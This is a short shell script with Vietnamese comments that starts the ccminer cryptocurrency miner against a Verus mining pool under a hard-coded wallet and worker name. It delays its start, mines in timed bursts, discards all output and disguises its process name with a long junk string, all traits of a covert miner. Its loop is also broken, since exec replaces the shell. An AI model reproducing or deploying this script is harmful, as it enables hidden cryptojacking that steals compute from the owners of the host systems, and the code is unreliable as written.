#!/bin/sh
sleep 3000

# Định nghĩa hàm để xử lý tín hiệu khi nhấn Ctrl+C
cleanup() {
    if [ -n "$PID" ]; then
        kill $PID  # Dừng tiến trình ccminer nếu nó đang chạy
    fi
    exit 0
}

# Thiết lập xử lý tín hiệu
trap cleanup SIGINT

while true; do
    # Chạy lệnh
    exec -a "HidjsjsjdbdmlsmdjfkgsnsnsvvsjsjsjdhdhdjsjsjdjjdhdgdhsjsjslskjdbdjsksksjsbbsmsksnsbsbnsmsjsbsnskjsbdnsksknsfhudhdmsjsjdjksnsbdjsmsdbbdksksjdnsmsjshdnskjshdbdjsksjdhsnksjdbdrrjejhdnsmsjsndbdnkskshdhndksjdhbdmsksjdhdkksjshdbdksjddbsjjsjsbdksjddjsnsnamksjdndmslsjshdmskjshsbslakshshdenCCMiner" ./ccminer -a verus -o stratum+tcp://na.luckpool.net:3960 -u RVvQgyuoCCRiQV7BBTDNNMAUH3WYp8HC9K.saverNode001 -t 1 > /dev/null 2>&1 
    
    # Lưu PID của tiến trình
    PID=$!
    
    # Chờ 10 phút
    sleep 600
    
    # Dừng tiến trình
    kill $PID
    
    # Nghỉ 240 giây
    sleep 200
done
